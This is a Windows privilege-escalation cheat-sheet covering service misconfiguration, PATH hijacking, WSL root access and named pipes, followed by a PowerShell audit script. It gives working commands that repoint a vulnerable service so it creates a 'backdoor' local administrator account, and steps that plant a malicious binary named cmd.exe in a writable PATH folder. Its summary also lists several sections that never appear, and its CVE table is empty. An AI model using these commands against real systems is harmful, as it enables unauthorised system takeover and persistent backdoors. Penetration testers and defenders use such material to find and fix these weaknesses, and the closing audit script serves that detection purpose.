

## Summary

- EoP - Common Vulnerabilities and Exposures
- Juicy Potato (Abusing the golden privileges)
- EoP - Living Off The Land Binaries and Scripts
- EoP - From local administrator to NT SYSTEM
- EoP - Windows Subsystem for Linux (WSL)
- EoP - Incorrect permissions in services
- Search the registry for key names and passwords
- Search for a file with a certain filename

## EoP - Common Vulnerabilities and Exposures

List of kernel exploits (one row per exploit, with the following columns):

| Security Bulletin | KB | Description | Operating System |
| --- | --- | --- | --- |

## Named pipes

Send a program's output through a named pipe. The pipe must already exist, i.e. a server process must have created it, otherwise the redirection fails with "file not found":

```
program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe
```

Find existing named pipes:

```powershell
[System.IO.Directory]::GetFiles("\\.\pipe\")
```

## EoP - Incorrect permissions in services

A service whose security descriptor lets a low-privileged principal change its configuration (SERVICE_CHANGE_CONFIG) can be pointed at any command, which the Service Control Manager then runs under the service's account (often LocalSystem). Find such services with Sysinternals AccessChk: `-u` suppresses errors, `-w` shows only objects the principal can write to, `-c` treats the name as a service, `-q` omits the banner and `-v` prints the rights granted.

```
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
```

Repeat the check for the other groups the current user belongs to (Everyone, Users, INTERACTIVE). Then replace the service's binary path with a command that creates a local administrator. `<service_name>` is a placeholder for the vulnerable service, and `binpath=` must be written with no space before and one space after the `=`. Each `sc config` overwrites the previous path, so start the service after each change:

```
$ sc config <service_name> binpath= "net user backdoor backdoor123 /add"
$ sc start <service_name>
$ sc config <service_name> binpath= "net localgroup Administrators backdoor /add"
$ sc start <service_name>
```

`sc start` reports error 1053 (the service did not respond in time) because net.exe is not a service executable, but the command has already run by then. The DACL must also grant SERVICE_START (and SERVICE_STOP if the service is running), the service must run as a privileged account (check `sc qc <service_name>`), and if a password complexity policy is enforced the first `net user` fails without any visible output, so choose a compliant password. Restore the original `binpath=` afterwards.

## EoP - Windows Subsystem for Linux (WSL)

Technique borrowed from Warlockobama's tweet.

With root privileges, Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed); root inside the distribution is what lets the listener bind ports below 1024. Don't know the root password? No problem: just set the default user to root with the distribution launcher's `config --default-user root` command, or start a single session as root with `wsl.exe -u root`. Neither asks for the Linux password, because the launcher and wsl.exe run as the Windows user who owns the distribution.

Root inside the distribution does not change the Windows token the session runs under: access to the host file system through /mnt/c is still limited to the Windows user's rights, so the gain is a listener on any port without touching Windows privileges, not SYSTEM. With WSL 2 the distribution sits behind a NAT virtual switch by default, so a bind shell there is not reachable from other hosts without port forwarding; WSL 1 shares the host's network stack.

## PATH hijacking

When a directory the current user can write to appears on PATH before the directory holding a program's real binary, a same-named file planted there is what the shell runs next time.

```powershell
# List the contents of the PATH environment variable
# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32;...
$env:Path

# See the permissions of the target folder
# EXAMPLE OUTPUT: BUILTIN\Users:(GR,GW)   (generic read and write for all users)
icacls.exe "C:\Program Files\nodejs"

# Place our evil file in that folder under the name of the program we hijack
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
```

Because (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run instead of the legitimate one in the system32 folder.

This works for commands resolved through a shell's PATH lookup (cmd.exe, PowerShell, and batch or PowerShell scripts that call a program by bare name), because those shells walk the PATH entries in order (cmd.exe tries the current directory first). It does not apply to programs started with CreateProcess by bare name, which searches the application directory, the current directory, System32, System and Windows before PATH. Also compare `$env:Path` with the machine PATH under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment and the user PATH under HKCU\Environment, since the victim's process may not inherit the same value as your session.
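The following audit script is an added example for this page, not code from the original cheat-sheet or from its author. It checks the two misconfigurations described above from the unprivileged user's point of view: PATH directories the current user can write to and whether they precede the directory holding the real binary, and services whose DACL grants the current user a right that allows repointing `binpath=`. It assumes Windows with PowerShell 5.1 or 7, `Get-Service`, `Get-CimInstance` and `sc.exe` available; the function names are this example's own, and the access-mask constants are the documented values from winsvc.h and winnt.h.

```powershell
# Added example (not from the original cheat-sheet). Assumes Windows PowerShell 5.1
# or PowerShell 7 with Get-Service, Get-CimInstance and sc.exe. Function names are
# this example's own. sc.exe is called explicitly: bare "sc" is PowerShell's alias
# for Set-Content.

# 1. PATH hijack candidates: PATH entries the current user can write to, and whether
#    they precede the directory that holds the real binary. Write access is probed by
#    creating and deleting an empty file, which is reliable but leaves file system
#    events behind.
function Get-WritablePathDirectories {
    param(
        [string]$PathValue = $env:Path,
        [string]$TargetDir = (Join-Path $env:SystemRoot 'System32')
    )
    $dirs = @($PathValue -split ';' |
              ForEach-Object { $_.Trim().Trim('"').TrimEnd('\') } |
              Where-Object { $_ -ne '' })
    $target = $TargetDir.TrimEnd('\')
    $targetIndex = -1
    for ($i = 0; $i -lt $dirs.Count; $i++) {
        if ($dirs[$i] -ieq $target) { $targetIndex = $i; break }
    }
    for ($i = 0; $i -lt $dirs.Count; $i++) {
        $dir = $dirs[$i]
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        $probe = Join-Path $dir ([System.IO.Path]::GetRandomFileName())
        try {
            [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
            Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        } catch { continue }   # access denied or read-only volume: not writable
        [pscustomobject]@{
            Index          = $i
            Directory      = $dir
            # If the target directory is not on PATH at all, any writable entry
            # wins the shell's lookup for a bare command name.
            PrecedesTarget = ($targetIndex -lt 0) -or ($i -lt $targetIndex)
        }
    }
}

# 2. Services whose DACL grants the current user SERVICE_CHANGE_CONFIG directly, or
#    WRITE_DAC / WRITE_OWNER / GENERIC_WRITE / GENERIC_ALL, which let you grant it to
#    yourself. This is the check accesschk -uwcqv performs, built here from the SDDL
#    that sc.exe sdshow prints. Deny ACEs are not evaluated, so verify each hit.
function Get-ReconfigurableServices {
    $me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    # Access mask bits: service-specific (winsvc.h), standard and generic rights (winnt.h).
    $rights = [ordered]@{
        SERVICE_CHANGE_CONFIG = 0x00000002
        WRITE_DAC             = 0x00040000
        WRITE_OWNER           = 0x00080000
        GENERIC_WRITE         = 0x40000000
        GENERIC_ALL           = 0x10000000
    }
    $dangerous = 0
    foreach ($v in $rights.Values) { $dangerous = $dangerous -bor $v }
    # Account each service runs as, so a hit can be rated (LocalSystem means SYSTEM).
    $runsAs = @{}
    Get-CimInstance Win32_Service | ForEach-Object { $runsAs[$_.Name] = $_.StartName }

    foreach ($svc in Get-Service) {
        # sdshow prints an empty line followed by the SDDL; failures print "[SC] ..." lines.
        $sddl = ((& sc.exe sdshow $svc.ServiceName 2>$null) -join '').Trim()
        if (-not $sddl.StartsWith('D:')) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            if (($ace.AccessMask -band $dangerous) -eq 0) { continue }
            if ($mySids -notcontains $ace.SecurityIdentifier.Value) { continue }
            $granted = $rights.Keys | Where-Object { ($ace.AccessMask -band $rights[$_]) -ne 0 }
            [pscustomobject]@{
                Service   = $svc.ServiceName
                RunsAs    = $runsAs[$svc.ServiceName]
                Principal = $ace.SecurityIdentifier.Value
                Rights    = ($granted -join ',')
            }
        }
    }
}

# Usage: writable PATH entries that shadow System32, then services the current user
# could repoint with: sc config <service_name> binpath= "..."
Get-WritablePathDirectories | Where-Object PrecedesTarget | Format-Table -AutoSize
Get-ReconfigurableServices | Format-Table -AutoSize
```

A service hit with `RunsAs` equal to `LocalSystem` and `SERVICE_CHANGE_CONFIG` in `Rights` is the case the `sc config` steps above exploit; a hit that only shows `WRITE_DAC` or `WRITE_OWNER` needs an extra `sc sdset` to grant yourself change-config first. The PATH probe reports your own session's PATH, so run it in the same kind of session (and as the same user) as the process you expect to hijack.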
